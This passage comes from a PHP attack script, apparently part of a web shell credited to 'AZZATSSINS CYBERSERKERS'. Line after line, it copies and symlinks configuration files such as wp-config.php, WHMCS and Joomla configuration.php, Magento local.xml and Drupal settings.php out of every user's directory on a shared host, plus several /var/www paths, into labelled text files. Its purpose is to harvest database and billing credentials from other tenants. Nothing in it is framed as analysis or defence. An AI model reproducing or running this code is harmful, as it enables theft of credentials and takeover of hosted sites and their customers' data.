  628. symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  629. symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  630. symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  631. symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  632. symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  633. symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  634. symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  635. symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  636. symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  637. symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  638. symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  639. symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  640. symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  641. symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  642. symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  643. symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  644. symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  645. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  646. symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  647. symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  648.  
  649. symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  650. symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  651. symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  652. symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  653. symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  654. symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  655. symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  656. symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  657. symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  658. symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  659. symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  660. symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  661. symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  662. symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  663. copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  664. copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  665. copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  666. copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  667. copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  668. copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  669. copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  670. copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  671. copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  672. /* CODED BY AZZATSSINS CYBERSERKERS */
  673. copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  674. copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  675. copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  676. copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  677. copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  678. copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  679. copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  680. copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  681. copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  682. copy('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  683. copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  684. copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  685. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  686. copy('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  687. copy('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  688. copy('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  689. copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  690. copy('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  691. copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  692. copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  693. copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  694. copy('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  695. copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  696. copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  697. symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  698. symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  699. symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  700. symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  701. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  702. symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  703. symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  704. symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  705. symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  706. symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  707. symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  708. symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  709. symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  710. symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  711. symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  712. symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  713. symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  714. symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  715. /*You Can ReCoded But Don't Change ©CopyRight*/
  716. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  717. symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  718. symlink('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  719. symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  720. symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  721. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  722. /* © BY AZZATSSINS CYBERSERKERS */
  723. symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  724. symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  725. symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  726. symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  727. symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  728. symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  729. symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  730. symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  731. symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  732. symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  733. symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  734. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  735. copy('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
  736. copy('/'.$home.'/'.$user.'/public_html/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  737. copy('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
  738. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  739. symlink('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
  740. symlink('/'.$home.'/'.$user.'/public_html/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  741. symlink('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
  742. copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  743. copy('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
  744. copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  745. copy('/'.$home.'/'.$user.'/public_html/config.php',$user.' <~ OTHER.txt');
  746. copy('/'.$home.'/'.$user.'/public_html/html/config.php',$user.' <~ PHPNUKE.txt');
  747. symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  748. symlink('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
  749. symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  750. symlink('/'.$home.'/'.$user.'/public_html/config.php',$user.' <~ OTHER.txt');
  751. symlink('/'.$home.'/'.$user.'/public_html/html/config.php',$user.' <~ PHPNUKE.txt');
  752. copy('/'.$home.'/'.$user.'/public_html/conn.php',$user.' <~ OTHER.txt');
  753. symlink('/'.$home.'/'.$user.'/public_html/conn.php',$user.' <~ OTHER.txt');
  754. symlink('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' <~ OTHER.txt');
  755. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ OTHER.txt');
  756. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ OTHER.txt');
  757. copy('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' <~ OTHER.txt');
  758. /* fb: /AZZATSSINS.CYBERSERKERS */
  759. copy('/var/www/wp-config.php','WORDPRESS.txt');
  760. copy('/var/www/configuration.php','JOOMLA.txt');
  761. copy('/var/www/config.inc.php','OPENJOURNAL.txt');
  762. copy('/var/www/config.php','OTHER.txt');
  763. copy('/var/www/config/koneksi.php','OTHER.txt');
  764. copy('/var/www/include/config.php','OTHER.txt');
  765. copy('/var/www/connect.php','OTHER.txt');
  766. copy('/var/www/config/connect.php','OTHER.txt');
  767. copy('/var/www/include/connect.php','OTHER.txt');
  768. copy('/var/www/html/wp-config.php','WORDPRESS.txt');
  769. copy('/var/www/html/configuration.php','JOOMLA.txt');
  770. copy('/var/www/html/config.inc.php','OPENJOURNAL.txt');
  771. copy('/var/www/html/config.php','OTHER.txt');
  772. copy('/var/www/html/config/koneksi.php','OTHER.txt');
  773. copy('/var/www/html/include/config.php','OTHER.txt');
  774. copy('/var/www/html/connect.php','OTHER.txt');
  775. copy('/var/www/html/config/connect.php','OTHER.txt');
  776. copy('/var/www/html/include/connect.php','OTHER.txt');
  777. symlink('/var/www/wp-config.php','WORDPRESS.txt');
  778. symlink('/var/www/configuration.php','JOOMLA.txt');
  779. symlink('/var/www/config.inc.php','OPENJOURNAL.txt');
  780. symlink('/var/www/config.php','OTHER.txt');
  781. symlink('/var/www/config/koneksi.php','OTHER.txt');
  782. symlink('/var/www/include/config.php','OTHER.txt');
  783. symlink('/var/www/connect.php','OTHER.txt');
  784. symlink('/var/www/config/connect.php','OTHER.txt');
  785. symlink('/var/www/include/connect.php','OTHER.txt');
  786. symlink('/var/www/html/wp-config.php','WORDPRESS.txt');
  787. symlink('/var/www/html/configuration.php','JOOMLA.txt');
  788. symlink('/var/www/html/config.inc.php','OPENJOURNAL.txt');
  789. symlink('/var/www/html/config.php','OTHER.txt');
  790. symlink('/var/www/html/config/koneksi.php','OTHER.txt');
  791. symlink('/var/www/html/include/config.php','OTHER.txt');
  792. symlink('/var/www/html/connect.php','OTHER.txt');
  793. symlink('/var/www/html/config/connect.php','OTHER.txt');
  794. symlink('/var/www/html/include/connect.php','OTHER.txt');
  795. copy('/'.$home.'/'.$user.'/www/suspended.page/index.html',$user.' <~ RESELLER.txt');
  796. symlink('/'.$home.'/'.$user.'/www/suspended.page/index.html',$user.' <~ RESELLER.txt');
  797. symlink('/'.$home.'/'.$user.'/www/.accesshash',$user.' <~ WHMCS.txt');
  798. copy('/'.$home.'/'.$user.'/www/wp-config.php',$user.' <~ WORDPRESS.txt');
  799. copy('/'.$home.'/'.$user.'/www/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  800. copy('/'.$home.'/'.$user.'/www/account/configuration.php',$user.' <~ WHMCS.txt');
  801. copy('/'.$home.'/'.$user.'/www/accounts/configuration.php',$user.' <~ WHMCS.txt');
  802. copy('/'.$home.'/'.$user.'/www/buy/configuration.php',$user.' <~ WHMCS.txt');
  803. copy('/'.$home.'/'.$user.'/www/checkout/configuration.php',$user.' <~ WHMCS.txt');
  804. copy('/'.$home.'/'.$user.'/www/central/configuration.php',$user.' <~ WHMCS.txt');
  805. copy('/'.$home.'/'.$user.'/www/clienti/configuration.php',$user.' <~ WHMCS.txt');
  806. copy('/'.$home.'/'.$user.'/www/client/configuration.php',$user.' <~ WHMCS.txt');
  807. copy('/'.$home.'/'.$user.'/www/cliente/configuration.php',$user.' <~ WHMCS.txt');
  808. copy('/'.$home.'/'.$user.'/www/clientes/configuration.php',$user.' <~ WHMCS.txt');
  809. copy('/'.$home.'/'.$user.'/www/clients/configuration.php',$user.' <~ WHMCS.txt');
  810. copy('/'.$home.'/'.$user.'/www/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  811. copy('/'.$home.'/'.$user.'/www/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  812. copy('/'.$home.'/'.$user.'/www/client-area/configuration.php',$user.' <~ WHMCS.txt');
  813. copy('/'.$home.'/'.$user.'/www/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  814. copy('/'.$home.'/'.$user.'/www/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  815. copy('/'.$home.'/'.$user.'/www/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  816. copy('/'.$home.'/'.$user.'/www/core/configuration.php',$user.' <~ WHMCS.txt');
  817. copy('/'.$home.'/'.$user.'/www/company/configuration.php',$user.' <~ WHMCS.txt');
  818. copy('/'.$home.'/'.$user.'/www/customer/configuration.php',$user.' <~ WHMCS.txt');
  819. copy('/'.$home.'/'.$user.'/www/customers/configuration.php',$user.' <~ WHMCS.txt');
  820. copy('/'.$home.'/'.$user.'/www/bill/configuration.php',$user.' <~ WHMCS.txt');
  821. copy('/'.$home.'/'.$user.'/www/billing/configuration.php',$user.' <~ WHMCS.txt');
  822. copy('/'.$home.'/'.$user.'/www/finance/configuration.php',$user.' <~ WHMCS.txt');
  823. copy('/'.$home.'/'.$user.'/www/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  824. copy('/'.$home.'/'.$user.'/www/host/configuration.php',$user.' <~ WHMCS.txt');
  825. copy('/'.$home.'/'.$user.'/www/hosts/configuration.php',$user.' <~ WHMCS.txt');
  826. copy('/'.$home.'/'.$user.'/www/hosting/configuration.php',$user.' <~ WHMCS.txt');
  827. copy('/'.$home.'/'.$user.'/www/hostings/configuration.php',$user.' <~ WHMCS.txt');
  828. copy('/'.$home.'/'.$user.'/www/klien/configuration.php',$user.' <~ WHMCS.txt');
  829. copy('/'.$home.'/'.$user.'/www/manage/configuration.php',$user.' <~ WHMCS.txt');
  830. copy('/'.$home.'/'.$user.'/www/manager/configuration.php',$user.' <~ WHMCS.txt');
  831. copy('/'.$home.'/'.$user.'/www/member/configuration.php',$user.' <~ WHMCS.txt');
  832. copy('/'.$home.'/'.$user.'/www/members/configuration.php',$user.' <~ WHMCS.txt');
  833. copy('/'.$home.'/'.$user.'/www/my/configuration.php',$user.' <~ WHMCS.txt');
  834. copy('/'.$home.'/'.$user.'/www/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  835. copy('/'.$home.'/'.$user.'/www/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  836. copy('/'.$home.'/'.$user.'/www/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  837. copy('/'.$home.'/'.$user.'/www/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  838. copy('/'.$home.'/'.$user.'/www/order/configuration.php',$user.' <~ WHMCS.txt');
  839. copy('/'.$home.'/'.$user.'/www/orders/configuration.php',$user.' <~ WHMCS.txt');
  840. copy('/'.$home.'/'.$user.'/www/painel/configuration.php',$user.' <~ WHMCS.txt');
  841. copy('/'.$home.'/'.$user.'/www/panel/configuration.php',$user.' <~ WHMCS.txt');
  842. copy('/'.$home.'/'.$user.'/www/panels/configuration.php',$user.' <~ WHMCS.txt');
  843. copy('/'.$home.'/'.$user.'/www/portal/configuration.php',$user.' <~ WHMCS.txt');
  844. copy('/'.$home.'/'.$user.'/www/portals/configuration.php',$user.' <~ WHMCS.txt');
  845. copy('/'.$home.'/'.$user.'/www/purchase/configuration.php',$user.' <~ WHMCS.txt');
  846.  
  847. copy('/'.$home.'/'.$user.'/www/secure/configuration.php',$user.' <~ WHMCS.txt');
  848. copy('/'.$home.'/'.$user.'/www/support/configuration.php',$user.' <~ WHMCS.txt');
  849. copy('/'.$home.'/'.$user.'/www/supporte/configuration.php',$user.' <~ WHMCS.txt');
  850. copy('/'.$home.'/'.$user.'/www/supports/configuration.php',$user.' <~ WHMCS.txt');
  851. copy('/'.$home.'/'.$user.'/www/web/configuration.php',$user.' <~ WHMCS.txt');
  852. copy('/'.$home.'/'.$user.'/www/webhost/configuration.php',$user.' <~ WHMCS.txt');
  853. copy('/'.$home.'/'.$user.'/www/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  854. copy('/'.$home.'/'.$user.'/www/whm/configuration.php',$user.' <~ WHMCS.txt');
  855. copy('/'.$home.'/'.$user.'/www/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  856. copy('/'.$home.'/'.$user.'/www/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  857. copy('/'.$home.'/'.$user.'/www/Whm/configuration.php',$user.' <~ WHMCS.txt');
  858. copy('/'.$home.'/'.$user.'/www/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  859. copy('/'.$home.'/'.$user.'/www/WHM/configuration.php',$user.' <~ WHMCS.txt');
  860. copy('/'.$home.'/'.$user.'/www/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  861. symlink('/'.$home.'/'.$user.'/www/wp-config.php',$user.' <~ WORDPRESS.txt');
  862. symlink('/'.$home.'/'.$user.'/www/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  863. symlink('/'.$home.'/'.$user.'/www/account/configuration.php',$user.' <~ WHMCS.txt');
  864. symlink('/'.$home.'/'.$user.'/www/accounts/configuration.php',$user.' <~ WHMCS.txt');
  865. symlink('/'.$home.'/'.$user.'/www/buy/configuration.php',$user.' <~ WHMCS.txt');
  866. symlink('/'.$home.'/'.$user.'/www/checkout/configuration.php',$user.' <~ WHMCS.txt');
  867. symlink('/'.$home.'/'.$user.'/www/central/configuration.php',$user.' <~ WHMCS.txt');
  868. symlink('/'.$home.'/'.$user.'/www/clienti/configuration.php',$user.' <~ WHMCS.txt');
  869. symlink('/'.$home.'/'.$user.'/www/client/configuration.php',$user.' <~ WHMCS.txt');
  870. symlink('/'.$home.'/'.$user.'/www/cliente/configuration.php',$user.' <~ WHMCS.txt');
  871. symlink('/'.$home.'/'.$user.'/www/clientes/configuration.php',$user.' <~ WHMCS.txt');
  872. symlink('/'.$home.'/'.$user.'/www/clients/configuration.php',$user.' <~ WHMCS.txt');
  873. symlink('/'.$home.'/'.$user.'/www/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  874. symlink('/'.$home.'/'.$user.'/www/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  875. symlink('/'.$home.'/'.$user.'/www/client-area/configuration.php',$user.' <~ WHMCS.txt');
  876. symlink('/'.$home.'/'.$user.'/www/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  877. symlink('/'.$home.'/'.$user.'/www/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  878. symlink('/'.$home.'/'.$user.'/www/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  879. symlink('/'.$home.'/'.$user.'/www/core/configuration.php',$user.' <~ WHMCS.txt');
  880. symlink('/'.$home.'/'.$user.'/www/company/configuration.php',$user.' <~ WHMCS.txt');
  881. symlink('/'.$home.'/'.$user.'/www/customer/configuration.php',$user.' <~ WHMCS.txt');
  882. symlink('/'.$home.'/'.$user.'/www/customers/configuration.php',$user.' <~ WHMCS.txt');
  883. symlink('/'.$home.'/'.$user.'/www/bill/configuration.php',$user.' <~ WHMCS.txt');
  884. symlink('/'.$home.'/'.$user.'/www/billing/configuration.php',$user.' <~ WHMCS.txt');
  885. symlink('/'.$home.'/'.$user.'/www/finance/configuration.php',$user.' <~ WHMCS.txt');
  886. symlink('/'.$home.'/'.$user.'/www/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  887. symlink('/'.$home.'/'.$user.'/www/host/configuration.php',$user.' <~ WHMCS.txt');
  888. symlink('/'.$home.'/'.$user.'/www/hosts/configuration.php',$user.' <~ WHMCS.txt');
  889. symlink('/'.$home.'/'.$user.'/www/hosting/configuration.php',$user.' <~ WHMCS.txt');
  890. symlink('/'.$home.'/'.$user.'/www/hostings/configuration.php',$user.' <~ WHMCS.txt');
  891. symlink('/'.$home.'/'.$user.'/www/klien/configuration.php',$user.' <~ WHMCS.txt');
  892. symlink('/'.$home.'/'.$user.'/www/manage/configuration.php',$user.' <~ WHMCS.txt');
  893. symlink('/'.$home.'/'.$user.'/www/manager/configuration.php',$user.' <~ WHMCS.txt');
  894. symlink('/'.$home.'/'.$user.'/www/member/configuration.php',$user.' <~ WHMCS.txt');
  895. symlink('/'.$home.'/'.$user.'/www/members/configuration.php',$user.' <~ WHMCS.txt');
  896. symlink('/'.$home.'/'.$user.'/www/my/configuration.php',$user.' <~ WHMCS.txt');
  897. symlink('/'.$home.'/'.$user.'/www/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  898. symlink('/'.$home.'/'.$user.'/www/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  899. symlink('/'.$home.'/'.$user.'/www/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  900. symlink('/'.$home.'/'.$user.'/www/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  901. symlink('/'.$home.'/'.$user.'/www/order/configuration.php',$user.' <~ WHMCS.txt');
  902. symlink('/'.$home.'/'.$user.'/www/orders/configuration.php',$user.' <~ WHMCS.txt');
  903. symlink('/'.$home.'/'.$user.'/www/painel/configuration.php',$user.' <~ WHMCS.txt');
  904. symlink('/'.$home.'/'.$user.'/www/panel/configuration.php',$user.' <~ WHMCS.txt');
  905. symlink('/'.$home.'/'.$user.'/www/panels/configuration.php',$user.' <~ WHMCS.txt');
  906. symlink('/'.$home.'/'.$user.'/www/portal/configuration.php',$user.' <~ WHMCS.txt');
  907. symlink('/'.$home.'/'.$user.'/www/portals/configuration.php',$user.' <~ WHMCS.txt');
  908. symlink('/'.$home.'/'.$user.'/www/purchase/configuration.php',$user.' <~ WHMCS.txt');
  909.  
  910. symlink('/'.$home.'/'.$user.'/www/secure/configuration.php',$user.' <~ WHMCS.txt');
  911. symlink('/'.$home.'/'.$user.'/www/support/configuration.php',$user.' <~ WHMCS.txt');
  912. symlink('/'.$home.'/'.$user.'/www/supporte/configuration.php',$user.' <~ WHMCS.txt');
  913. symlink('/'.$home.'/'.$user.'/www/supports/configuration.php',$user.' <~ WHMCS.txt');
  914. symlink('/'.$home.'/'.$user.'/www/web/configuration.php',$user.' <~ WHMCS.txt');
  915. symlink('/'.$home.'/'.$user.'/www/webhost/configuration.php',$user.' <~ WHMCS.txt');
  916. symlink('/'.$home.'/'.$user.'/www/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  917. symlink('/'.$home.'/'.$user.'/www/whm/configuration.php',$user.' <~ WHMCS.txt');
  918. symlink('/'.$home.'/'.$user.'/www/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  919. symlink('/'.$home.'/'.$user.'/www/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  920. symlink('/'.$home.'/'.$user.'/www/Whm/configuration.php',$user.' <~ WHMCS.txt');
  921. symlink('/'.$home.'/'.$user.'/www/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  922. symlink('/'.$home.'/'.$user.'/www/WHM/configuration.php',$user.' <~ WHMCS.txt');
  923. symlink('/'.$home.'/'.$user.'/www/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  924. copy('/'.$home.'/'.$user.'/www/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  925. copy('/'.$home.'/'.$user.'/www/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  926. copy('/'.$home.'/'.$user.'/www/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  927. copy('/'.$home.'/'.$user.'/www/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  928. copy('/'.$home.'/'.$user.'/www/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  929. copy('/'.$home.'/'.$user.'/www/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  930. copy('/'.$home.'/'.$user.'/www/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  931. copy('/'.$home.'/'.$user.'/www/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  932. copy('/'.$home.'/'.$user.'/www/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  933. /* CODED BY AZZATSSINS CYBERSERKERS */
  934. copy('/'.$home.'/'.$user.'/www/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  935. copy('/'.$home.'/'.$user.'/www/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  936. copy('/'.$home.'/'.$user.'/www/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  937. copy('/'.$home.'/'.$user.'/www/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  938. copy('/'.$home.'/'.$user.'/www/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  939. copy('/'.$home.'/'.$user.'/www/press/wp-config.php',$user.' <~ WORDPRESS.txt');
